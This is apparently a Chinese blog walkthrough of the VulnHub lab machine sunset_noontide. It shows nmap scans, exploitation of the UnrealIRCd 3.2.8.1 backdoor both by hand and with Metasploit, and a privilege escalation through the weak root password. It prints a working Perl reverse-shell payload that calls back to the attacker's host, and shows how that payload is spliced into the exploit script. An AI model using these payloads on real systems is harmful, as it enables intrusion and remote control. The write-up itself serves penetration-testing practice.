sunset_noontide 靶机

sunset_noontide

信息收集

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 05:25 EDT
Nmap scan report for 192.168.56.150
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
6667/tcp open  irc
6697/tcp open  ircs-u
8067/tcp open  infi-async
MAC Address: 08:00:27:91:A9:5B (Oracle VirtualBox virtual NIC)

开了三个不太熟悉的端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ sudo nmap -sT -sV -sC -O -p6667,6697,8067 192.168.56.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 05:26 EDT
Nmap scan report for 192.168.56.150
Host is up (0.00083s latency).

PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
MAC Address: 08:00:27:91:A9:5B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.5 (97%), Linux 3.1 (95%), Linux 3.2 (95%), Check Point VPN-1 UTM appliance (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Netgear GS700T- or XS700T-series switch (94%), Linux 2.6.32 (93%), Linux 3.2 - 4.9 (93%), Linux 4.15 - 5.8 (93%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: irc.foonet.com

irc 服务不太了解,不过还是把流程走完吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ sudo nmap --script=vuln -p6667,6697,8067 192.168.56.150 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 05:27 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.150
Host is up (0.00033s latency).

PORT     STATE SERVICE
6667/tcp open  irc
6697/tcp open  ircs-u
| irc-botnet-channels: 
|_  ERROR: Closing Link: [192.168.56.106] (Too many unknown connections from your IP)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
8067/tcp open  infi-async
| irc-botnet-channels: 
|_  ERROR: Closing Link: [192.168.56.106] (Too many unknown connections from your IP)
MAC Address: 08:00:27:91:A9:5B (Oracle VirtualBox virtual NIC)

IRC 渗透

那就只能从 irc 着手了,查到了一些相关资料

kali/kali服务器攻击/11攻击 Unreal Ircd 服务.md at master · Yehnn/kali (github.com)

大部分都是直接使用 msf 的

不使用 msf 的话,exp 中的 pl 脚本直接运行有问题。需要自己手动修改一下,替换为自己的 payload,这个技巧也在刚才链接的博客里有提到

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ msfvenom -p cmd/unix/reverse_perl LHOST=192.168.56.106 LPORT=443 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 232 bytes
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.106:443");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

接下来我们要观察原来 payload 的结构,看看如何将自己的 payload 加进去。首先是 payload 开头都有 AB; 这应该是必要的代码,接下来要注意引号问题,这里我们将生成的代码中的单引号用反斜线转义

1
my $payload1 = 'AB; perl -MIO -e \'$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.106:443");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\'';

亲测可以反弹 shell。用 msf 也试一下

1
2
3
4
5
6
7
8
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.56.150
RHOSTS => 192.168.56.150
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[-] 192.168.56.150:6697 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.

可以使用 show payloads 查看可用的 paylaod,我按照刚才链接的那篇文章中的方法,设置 payload 为 cmd/unix/reverse_perl ,并设置了LHOST

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.56.106
LHOST => 192.168.56.106
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP handler on 192.168.56.106:4444 
[*] 192.168.56.150:6667 - Connected to 192.168.56.150:6667...
    :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
    :irc.foonet.com NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead
[*] 192.168.56.150:6667 - Sending backdoor command...
   
[*] Command shell session 1 opened (192.168.56.106:4444 -> 192.168.56.150:51882) at 2023-10-09 07:31:46 -0400

whoami
server
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:91:a9:5b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.150/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 595sec preferred_lft 595sec
    inet6 fe80::a00:27ff:fe91:a95b/64 scope link 
       valid_lft forever preferred_lft forever
which python2
which python3
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
server@noontide:~/irc/Unreal3.2$
server@noontide:~/irc$ cd ..
cd ..
server@noontide:~$ ls
ls
irc  local.txt
server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e

也可以使用下面的 Python 脚本来 Getshell,记得替换脚本中的LHOST

Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor: My backdoor script for a vulnerable version of UnrealIRCd (github.com)

提权部分卡了好大一会,尝试了敏感文件、定时文件、SUID 文件、shadow 文件权限、Linpeas 收集信息

弱密码提权

没想到,竟然直接 root 弱密码,没绷住

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
server@noontide:~/irc/Unreal3.2$ su
su
Password: root

root@noontide:/home/server/irc/Unreal3.2# cd /root
cd /root
root@noontide:~# ls 
ls
proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@noontide:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:91:a9:5b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.150/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 595sec preferred_lft 595sec
    inet6 fe80::a00:27ff:fe91:a95b/64 scope link 
       valid_lft forever preferred_lft forever
root@noontide:~# uname -a
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
root@noontide:~# id
id
uid=0(root) gid=0(root) groups=0(root)
knowledge_database > vulnhub
sunset_noontide 靶机
https://i3eg1nner.github.io/2023/10/125a16ce3195.html
作者
I3eg1nner
发布于
2023年10月9日
许可协议